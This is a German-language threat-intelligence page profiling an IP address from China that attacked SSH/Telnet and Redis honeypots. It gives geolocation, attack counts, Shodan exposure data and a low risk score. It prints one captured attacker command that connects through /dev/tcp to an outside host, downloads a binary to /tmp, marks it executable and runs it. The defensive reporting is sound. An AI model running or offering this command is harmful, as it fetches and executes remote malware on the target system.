TROYANOSYVIRUS
Aktive BedrohungNIEDRIG

111.228.49.188

Herkunftsland🇨🇳 China
Erste Erkennung21.4.2026
Letzte Aktivitat21.4.2026
ISPChina Telecom Beijing Tianjin Hebei Big Data Industry Park Branch
🎯
32
Gesamtangriffe
🔌
2
Ports
📡
2
Angriffsarten
🦠
1
Malware

Geolokalisierung

Land
🇨🇳 China
Stadt
Unbekannt
ASN
AS141679
ISP
China Telecom Beijing Tianjin Hebei Big Data Industry Park Branch

Angriffsarten

ssh_telnet_honeypot
redis_honeypot

Angegriffene Ports

226379

Zugehorige Malware

Ausgefuhrte Befehle

$nohup bash -c "exec 6<>/dev/tcp/203.57.109.214/60114 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/dtNIsqyZpB && chmod +x /tmp/dtNIsqyZpB && /tmp/dtNIsqyZpB /n0cXTj28PL2Ol0Xc4GCaRRbO+n08fg6XB9zgYFlAFky9vT94DFbHmyChn0cXTj28PL2Ol0Xc4GCaRRbO+n08WzeZFCLuOksYIA9SoPfkJ4=" &1x

Shodan InternetDB ExpositionShodan

InternetDB-Daten, nicht in Echtzeit

Ports
22300118789
CPEs
cpe:/a:openbsd:openssh:8.9p1cpe:/o:canonical:ubuntu_linux

Risikobewertung

35
/100
NiedrigMittelHochKritisch